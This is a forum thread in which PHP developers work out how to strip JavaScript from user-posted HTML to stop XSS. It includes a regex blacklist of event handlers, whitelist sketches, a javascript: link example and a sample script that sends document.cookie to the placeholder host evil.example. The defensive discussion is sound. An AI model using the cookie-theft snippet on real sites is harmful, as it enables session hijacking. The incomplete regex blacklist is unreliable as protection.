javascript =)
Moderator: General Moderators
Does all JavaScript need to be triggered by an event, such as onLoad, onMouseOver, onMouseOut, etc.?
If I replace all of these words with 'bswords' or something similar, will this effectively disable JavaScript?
Set Search Time - A google chrome extension. When you search only results from the past year (or set time period) are displayed. Helps tremendously when using new technologies to avoid outdated results.
Hmm... this was just my prerequisite to the security question. In order to protect against it, I needed to know how it can be delivered.
Edit: I guess this could be switched over to security now =). As a beginning to disabling JavaScript, I should filter the <script></script> tags. Perhaps strip_tags() would get rid of that. Then I'll replace all of the event words with something (yet to figure that out). Where should I go from there? I'm just trying to get some logic.. in English.. then translate that to code.. later.
- Ambush Commander
- DevNet Master
- Posts: 3698
- Joined: Mon Oct 25, 2004 9:29 pm
- Location: New Jersey, US
Here's what I'm thinking.
1. Parse all tags and remove tags not on whitelist (tags not on whitelist include <script></script>). Check tags for well-formedness, make sure the nesting is correct
2. Parse all attribute values to make sure their forms are compliant with the doctype and on your attribute whitelist for a particular tag. So, an A tag would have HREF whitelisted but not ONCLICK. And the attribute parser would make sure that HREF != "javascript:do_evil_stuff"
By the way, if you end up doing all that, could you, like, release the code publicly? It would be a really nice HTML library.
I'm calling for a shoot first, ask questions later policy. Rather than asking yourself what you should get rid of, ask yourself what you should keep. But by doing this, a simple regexp solution will not work.
Ideally... You implement a doctype parser. You then extend that parser to include more restrictions that are not possible in current doctype syntaxes. Then, you build a simplified doctype for what you would consider "secure" (leave out definitions for SCRIPT et cetera). You may need to hardcode extra restrictions. Then, you feed it into a script that parses HTML tags. Allow for some smartness when correcting tags, like a Tidy-style project. Have the script parse everything, and then have it check the result against the doctype. Implement parsers for all RFC definitions, and whitelist those accordingly: this will be used for the attributes.
Of course, this is overkill.
But it's still mad cool. X)
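A much smaller version of the two steps above can be sketched with PHP's bundled DOM extension instead of a full doctype parser. Everything here is an assumption for illustration: the function name sketch_whitelist_html(), the contents of the whitelist, the choice to drop non-whitelisted elements together with their contents, and the rule that HREF must start with http:// or https://. It also assumes the DOM extension is enabled and the input is plain ASCII.

```php
<?php
// Sketch only: whitelist-based cleanup using PHP's DOM extension.
// $allowed maps a lowercase tag name to its allowed attribute names.
function sketch_whitelist_html($html, array $allowed)
{
    $doc = new DOMDocument();
    // The wrapper <div> lets us recover just the fragment afterwards.
    // @ hides libxml warnings about sloppy markup. Encoding handling is
    // omitted, so this assumes plain ASCII input.
    @$doc->loadHTML('<div>' . $html . '</div>');
    $root = $doc->getElementsByTagName('div')->item(0);

    // Copy the live node list into an array before modifying the tree.
    $elements = array();
    foreach ($root->getElementsByTagName('*') as $el) {
        $elements[] = $el;
    }

    foreach ($elements as $el) {
        $tag = strtolower($el->nodeName);
        if (!isset($allowed[$tag])) {
            // Not on the whitelist: drop the element and everything in it.
            if ($el->parentNode !== null) {
                $el->parentNode->removeChild($el);
            }
            continue;
        }
        // Collect attribute names first, then remove the unlisted ones.
        $names = array();
        foreach ($el->attributes as $attr) {
            $names[] = $attr->nodeName;
        }
        foreach ($names as $name) {
            if (!in_array(strtolower($name), $allowed[$tag], true)) {
                $el->removeAttribute($name);
            }
        }
        // HREF must look like an ordinary http(s) URL, so javascript: is rejected.
        if ($el->hasAttribute('href')
            && !preg_match('#^https?://#i', trim($el->getAttribute('href')))) {
            $el->removeAttribute('href');
        }
    }

    // Serialize only the children of the wrapper, not the whole document.
    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}
```

Called with a whitelist such as array('p' => array(), 'b' => array(), 'a' => array('href')), this should keep paragraphs, bold text and plain http links while dropping SCRIPT elements, ONCLICK attributes and javascript: HREFs. Because the parser rebuilds the tree, badly nested tags come back well-formed, which roughly covers the "Tidy-like" correction step.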
well here's what I got so far.. it might not be as advanced as described above
but it's a start..
Currently it replaces everything from <script... /script> with nothing.
Then replaces javascript event handlers with "badboy".
However I don't think this list is complete.
What would be my next step in removing javascript? Previously the only way I knew how to include javascript was with an event handler.
Code: Select all
/* Strip javascript.. or attempt to */
function me_strip_js($string)
{
    /* Replace everything between <script></script> tags with nothing */
    $string = preg_replace('#<script\b.*?</script\s*>#is', '', $string);
    /* If they didn't place a </script> tag, replace the <script> with nothing.
       [^>]* stops at the end of the tag, so a bare <script> is caught too. */
    $string = preg_replace('#<script\b[^>]*>#i', '', $string);
    /* Javascript event handlers (plus iframe) to neutralise; this list is not complete */
    $words = array(
        'onabort', 'onblur', 'onchange', 'onclick', 'ondblclick', 'ondragdrop',
        'onerror', 'onfocus', 'onkeydown', 'onkeypress', 'onkeyup', 'onload',
        'onmousedown', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup',
        'onmove', 'onreset', 'onresize', 'onselect', 'onsubmit', 'onunload',
        'iframe',
    );
    /* Replace each word with "badboy" when it appears inside of < >'s */
    foreach ($words as $word) {
        $string = preg_replace('/(<[^>]*?)\b' . $word . '\b(.+?>)/is', '${1}badboy$2', $string);
    }
    /* Return the result */
    return $string;
}
- CoderGoblin
- DevNet Resident
- Posts: 1425
- Joined: Tue Mar 16, 2004 10:03 am
- Location: Aachen, Germany
you can't load an iframe, look at my last regex 
- n00b Saibot
- DevNet Resident
- Posts: 1452
- Joined: Fri Dec 24, 2004 2:59 am
- Location: Lucknow, UP, India
- Contact:
- Ambush Commander
- DevNet Master
- Posts: 3698
- Joined: Mon Oct 25, 2004 9:29 pm
- Location: New Jersey, US
You missed the pseudoprotocol javascript.
Code: Select all
<a href="javascript:do_some_badstuff();">Don't click here!</a>
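One way to deal with the javascript: pseudoprotocol is to whitelist URL schemes rather than search for the word "javascript". The following is only a sketch: sketch_is_safe_href() is a made-up name, and the allowed schemes (http, https, mailto) are an assumption you would adjust for your own site.

```php
<?php
// Sketch only: accept an HREF value when it is relative or uses a whitelisted scheme.
function sketch_is_safe_href($href)
{
    // Decode entities, then remove whitespace and control characters.
    // Browsers strip tabs and newlines from URLs, so "java\tscript:" can still run.
    $clean = html_entity_decode($href, ENT_QUOTES, 'UTF-8');
    $clean = preg_replace('/[\x00-\x20]+/', '', $clean);

    // Text before the first colon counts as a scheme, unless a /, ? or # comes first.
    if (preg_match('/^([^\/?#:]*):/', $clean, $m)) {
        return in_array(strtolower($m[1]), array('http', 'https', 'mailto'), true);
    }

    // No scheme at all: treat it as a relative URL.
    return true;
}
```

With this check, the link above is rejected because its scheme is "javascript", while http://example.com/ and a relative path like /forum/index.php pass. Any scheme not on the list is refused, including ones you never thought of.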
- Ambush Commander
- DevNet Master
- Posts: 3698
- Joined: Mon Oct 25, 2004 9:29 pm
- Location: New Jersey, US
JavaScript, being a programming language, can be exploited easily. While web browsers try to do the best they can to prevent the writer of the system from abusing the user (such as preventing write access to a file upload field), they cannot protect a website from itself.
JavaScript has the ability to read and write cookies, as well as the ability to transmit their contents. Say I have a webpage that allows arbitrary HTML to be posted on it. An attacker could conceivably post a JavaScript snippet that would send the contents of all cookies to the attacker, which is an XSS attack. They could also make an infinite loop on a modal dialogue, and render the browser useless (if you do while(true) alert('Haha!'); on Firefox, there is no way to abort except by using the Task Manager). You'd have to be a fool to allow user-submitted JavaScript on pages that are accessible by everyone.
There are notable exceptions. Wikipedia, for instance, offers a page called monobook.js to its users. Only the owner of this page is allowed to edit it, and the JavaScript written there is automatically included in their pages when they are logged in, but doesn't affect anyone else. When no one but the attacker can see the JavaScript, there is no security hole. But if people are writing content for the masses, can publish it without moderation (you can always try auditing JavaScript code for things that specifically need it), and can use JavaScript, that's a security hole.
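For pages that don't need user-supplied markup at all, the cookie-stealing scenario can be avoided by escaping everything on output, so the browser shows the snippet as text instead of running it. A minimal sketch, assuming a hypothetical helper named sketch_escape_post() and UTF-8 content:

```php
<?php
// Sketch only: turn user input into inert text before printing it into a page.
function sketch_escape_post($text)
{
    // ENT_QUOTES also escapes single quotes, which matters inside attributes.
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// A cookie-stealing attempt of the kind described above (evil.example is a placeholder host).
$post = '<script>new Image().src="http://evil.example/?c=" + document.cookie;</script>';
$safe = sketch_escape_post($post);
```

After escaping, the angle brackets and quotes are entities, so the post displays as literal text. This only fits when posts are plain text; if some HTML must be allowed, filtering against a whitelist is still needed.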